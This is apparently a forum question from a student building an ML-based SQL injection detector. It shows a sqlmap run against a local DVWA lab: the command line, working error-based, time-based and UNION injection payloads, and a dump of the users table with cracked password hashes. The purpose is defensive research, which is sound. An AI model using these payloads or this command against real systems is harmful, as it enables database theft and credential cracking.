I'm writing thesis for my university. My theme of thesis is "SQL injection detection by using Machine Learning"
To use Machine Learning, first of all, I need thousands of learning data of SQL injection attack.
For that, I proceeded below process.
- Install Virtual Box
- Install Kali Linux on Virtual Box
- Install DVWA(Damn Vulnerable Web Application) on Kali Linux
- Attack to DVWA by using sqlmap
On No.4, I succeeded in attacking to DVWA, but I don't know how to get bunch of attacking data. What I want to get is bunch of actual attacking SQL.
1. launched server.
┌──(rootkali)-[/home/kali]
└─# service apache2 start
┌──(rootkali)-[/home/kali]
└─# service mysql start
2. Got cookie and target URL
document.cookie
"security=low; PHPSESSID=cookieinfo"
3 Attack
┌──(rootkali)-[/usr/bin]
└─# sqlmap -o -u "http://localhost/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=[cookieinfo];security=low" --dump
___
__H__
___ ___[,]_____ ___ ___ {1.4.11#stable}
|_ -| . ['] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:08:01 /2020-12-01/
[10:08:01] [INFO] resuming back-end DBMS 'mysql'
[10:08:01] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 1995 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT (ELT(1995=1995,1))),0x71626a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- qoRd&Submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 9863 FROM (SELECT(SLEEP(5)))PIFI)-- JYNK&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x7162707a71,0x744e45686f7a55414a6744636c497367666d62567679764247415656677779516a76584474645269,0x71626a7871)#&Submit=Submit
---
[10:08:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.46
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[10:08:01] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[10:08:01] [INFO] fetching current database
[10:08:01] [INFO] fetching tables for database: 'dvwa'
[10:08:01] [INFO] fetching columns for table 'users' in database 'dvwa'
[10:08:01] [INFO] fetching entries for table 'users' in database 'dvwa'
[10:08:01] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[10:08:07] [INFO] writing hashes to a temporary file '/tmp/sqlmaphbMPEH3181/sqlmaphashes-7QbpSl.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[10:08:12] [INFO] using hash method 'md5_generic_passwd'
[10:08:12] [INFO] resuming password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'
[10:08:12] [INFO] resuming password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'
[10:08:12] [INFO] resuming password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7'
[10:08:12] [INFO] resuming password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'
Database: dvwa
Table: users
[5 entries]
+---------+-----------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+
| user_id | avatar | user | password | last_name | first_name | last_login | failed_login |
+---------+-----------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+
| 1 | /DVWA-master/hackable/users/admin.jpg | admin | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin | admin | 2020-11-29 01:54:52 | 0 |
| 2 | /DVWA-master/hackable/users/gordonb.jpg | gordonb | e99a18c428cb38d5f260853678922e03 (abc123) | Brown | Gordon | 2020-11-29 01:54:52 | 0 |
| 3 | /DVWA-master/hackable/users/1337.jpg | 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | Me | Hack | 2020-11-29 01:54:52 | 0 |
| 4 | /DVWA-master/hackable/users/pablo.jpg | pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | Picasso | Pablo | 2020-11-29 01:54:52 | 0 |
| 5 | /DVWA-master/hackable/users/smithy.jpg | smithy | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith | Bob | 2020-11-29 01:54:52 | 0 |
+---------+-----------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+
[10:08:12] [INFO] table 'dvwa.users' dumped to CSV file '/root/.local/share/sqlmap/output/localhost/dump/dvwa/users.csv'
[10:08:12] [INFO] fetching columns for table 'guestbook' in database 'dvwa'
[10:08:12] [INFO] fetching entries for table 'guestbook' in database 'dvwa'
Database: dvwa
Table: guestbook
[1 entry]
+------------+------+-------------------------+
| comment_id | name | comment |
+------------+------+-------------------------+
| 1 | test | This is a test comment. |
+------------+------+-------------------------+
[10:08:13] [INFO] table 'dvwa.guestbook' dumped to CSV file '/root/.local/share/sqlmap/output/localhost/dump/dvwa/guestbook.csv'
[10:08:13] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/localhost'
[*] ending @ 10:08:13 /2020-12-01/
What I want to get is bunch of actual attacking SQL. Please anyone help me. Thank you.